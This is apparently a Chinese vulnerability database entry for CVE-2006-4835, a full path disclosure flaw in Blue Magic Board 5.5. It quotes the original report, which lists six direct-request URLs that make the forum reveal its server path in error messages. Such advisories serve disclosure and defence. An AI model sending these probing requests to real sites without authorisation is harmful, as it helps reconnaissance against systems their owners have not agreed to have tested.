Bluview Blue Magic Board 多个敏感信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193483 漏洞类型 未知
发布时间 2006-09-15 更新时间 2006-09-15
CVE编号 CVE-2006-4835 CNNVD-ID CNNVD-200609-276
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/84183
https://cxsecurity.com/issue/WLB-2006090114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-276
|漏洞详情
BluviewBlueMagicBoard(BMB)(也称为BMForum)5.5,远程攻击者可以通过直接请求(1)footer.php,(2)header.php,(3)db_mysql_error.php,(4)langlist.php,(5)sendmail.php或(6)style.php,在各种错误消息中揭示路径,从而获取敏感信息。
|漏洞EXP
Blue Magic Board (BMB) is nice forum system written by http://bmforum.com

Some file error and show fullpath. I test newest version, maybe all older versions are infected.

http://domain.ext/[bmb_path]/footer.php

http://domain.ext/[bmb_path]/header.php

http://domain.ext/[bmb_path]/include/db/db_mysql_error.php

http://domain.ext/[bmb_path]/datafile/langlist.php

http://domain.ext/[bmb_path]/datafile/sendmail.php

http://domain.ext/[bmb_path]/datafile/style.php

This was reported Admin but haven't received reply yet.
|受影响的产品
Bluview Blue Magic Board 5.5
|参考资料

来源:BUGTRAQ
名称:20060914FullpathdisclosureinBlueMagicBoard5.5
链接:http://www.securityfocus.com/archive/1/archive/1/446037/100/0/threaded
来源:XF
名称:bluemagicboard-footer-path-disclosure(28949)
链接:http://xforce.iss.net/xforce/xfdb/28949
来源:SREASON
名称:1586
链接:http://securityreason.com/securityalert/1586